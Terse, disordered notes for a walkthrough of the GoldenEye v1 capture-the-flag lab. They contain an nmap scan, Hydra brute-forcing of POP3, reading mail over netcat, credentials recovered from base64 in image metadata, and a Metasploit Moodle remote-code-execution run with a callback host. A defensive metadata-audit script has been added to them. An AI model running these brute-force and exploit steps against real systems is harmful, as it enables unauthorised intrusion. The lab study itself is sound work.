Golden Eye Vulnerability

Golden Eye v1 walkthrough

PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
55006/tcp open unknown
55007/tcp open unknown

encoded password - InvincibleHack3r

user password
boris secret1!
natalya bird
xenia RCP90rulez!
doak goat
username: dr_doak
password: 4England!
base64 eFdpbnRlcjE5OTV4IQ==
admin xWinter1995x!

arp

sudo netdiscover -r 192.168.0.0/24 -i eth0

./nmapAutomator.sh 192.168.0.199 All
192.168.0.199/terminal.js
Burp Pro
Decoder option
InvincibleHack3r

InvincibleHack3r

user password
boris InvincibleHack3r
http://192.168.0.199/sev-home/

nc 192.168.0.199 55006
LIST

user boris
pass secret1

http://severnaya-station.com/gnocertdir
mozilla proxy or host name

sudo nano /etc/hosts
192.168.0.199 severnaya-station.com

WEBPAGE
VIEW PAGE SOURCE / INSPECT

INDEX.JS
telnet 192.168.0.199 55007

sudo apt install hydra

sudo apt install wordlists

hydra -l boris -P /usr/share/seclists/Passwords/2020-200_most_used_passwords.txt 192.168.0.199 -s 55007 pop3

nc 192.168.0.199 55007
user boris
pass secret1
LIST
+OK 3 messages:
1 544
2 373
3 921
RETR 1
RETR 2
RETR 3

hydra -l doak -P /usr/share/seclists/Passwords/2020-200_most_used_passwords.txt 192.168.0.199 -s 55007 pop3

nc 192.168.0.199 55007
user doak
pass secret1
LIST
+OK 3 messages:
1 544
2 373
3 921
RETR 1
RETR 2
RETR 3
http://severnaya-station.com/gnocertdir
username: dr_doak
password: 4England!

search s3cret.txt
http://severnaya-station.com/dir007key/for-007.jpg
save file
sudo apt install exiftool
exiftool for-007.jpg
search Image Description >>>>> eFdpbnRlcjE5OTV4IQ==
https://www.base64decode.org/
eFdpbnRlcjE5OTV4IQ==
decode
xWinter1995x!
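
Added example, not part of the original notes: a pre-publication audit that scans exiftool output for metadata values that are base64 of printable text, which is how the admin password above leaked through for-007.jpg. The sample output is constructed; only the Image Description value comes from these notes, and the other tag values are placeholders.

```python
import base64
import binascii
import re
import string

# Constructed sample of `exiftool for-007.jpg` output. Only the
# Image Description value is from the notes; the rest are placeholders.
SAMPLE_EXIFTOOL_OUTPUT = """\
File Name                       : for-007.jpg
File Type                       : JPEG
Image Description               : eFdpbnRlcjE5OTV4IQ==
Make                            : ExampleCam
Software                        : ExampleEditor
Image Width                     : 313
"""

# Candidate base64 token: 12+ alphabet characters, optional padding.
B64_TOKEN = re.compile(
    r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{12,}={0,2}(?![A-Za-z0-9+/=])")
# Printable ASCII, keeping the space but no other whitespace.
PRINTABLE = set(string.printable) - set("\t\n\r\x0b\x0c")


def decode_if_text(token):
    """Return the decoded text if token is base64 of printable ASCII."""
    if len(token) % 4:
        return None  # not a whole number of base64 quanta
    try:
        text = base64.b64decode(token, validate=True).decode("ascii")
    except (binascii.Error, ValueError):
        return None  # bad padding/alphabet, or decodes to binary
    return text if text and all(c in PRINTABLE for c in text) else None


def audit_metadata(exiftool_output):
    """Return (tag, token, decoded) for each text-bearing base64 value."""
    findings = []
    for line in exiftool_output.splitlines():
        tag, sep, value = line.partition(":")
        if not sep:
            continue
        for token in B64_TOKEN.findall(value):
            decoded = decode_if_text(token)
            if decoded is not None:
                findings.append((tag.strip(), token, decoded))
    return findings


if __name__ == "__main__":
    for tag, token, decoded in audit_metadata(SAMPLE_EXIFTOOL_OUTPUT):
        print(f"[!] {tag}: {token} decodes to readable text: {decoded!r}")
```

Any finding means the image should have its metadata stripped and the exposed credential rotated before the file is served.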

http://severnaya-station.com/
admin xWinter1995x
site administration>Plugins>Text editor>manage editor>
Pspellshell
search google pspell shell exploit

msfconsole
search moodle
use exploit/multi/http/moodle_spelling_path_rce
choose zero
show info
options
set PASSWORD xWinter1995x!
set RHOSTS severnaya-station.com
set targeturi /gnocertdir
set LHOST 192.168.0.181
press Ctrl+L
options
run
https://github.com/jseidl/GoldenEye
service tor start

sudo apt-get install etherape
sudo etherape